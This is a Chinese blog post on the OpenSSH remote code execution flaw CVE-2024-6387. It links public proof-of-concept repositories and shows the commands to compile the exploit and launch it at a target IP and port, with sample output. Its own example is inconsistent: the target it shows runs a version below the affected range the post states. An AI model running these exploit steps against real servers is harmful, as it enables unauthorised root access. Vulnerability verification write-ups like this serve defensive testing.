SSH远程命令执行漏洞(CVE-2024-6387)验证
小镇航海家 2024-07-18 16:37:01 阅读 84
0x01、漏洞名称
OpenSSH远程代码执行漏洞 (CVE-2024-6387)
0x02、漏洞简介
OpenSSH是SSH(Secure SHell)协议的开源实现,它通过不安全的网络在两个不受信任的主机之间提供安全的加密通信。OpenSSH 广泛用于基于Unix 的系统,通常用于安全远程登录和远程文件传输,以及其它网络服务。OpenSSH 远程代码执行漏洞(CVE-2024-6387),该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题,未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。
受影响版本:8.5p1 <= OpenSSH < 9.8p1
0x03、漏洞利用poc
<code>https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
0x04、漏洞验证
将poc编译成可执行文件
gcc -o exploit 7etsuo-regreSSHion.c
对目标进行验证
./exploit ip 端口
./exploit 192.168.24.139 22
返回结果
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4
Received KEX_INIT (1024 bytes)
send_packet: Connection reset by peer
声明
本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。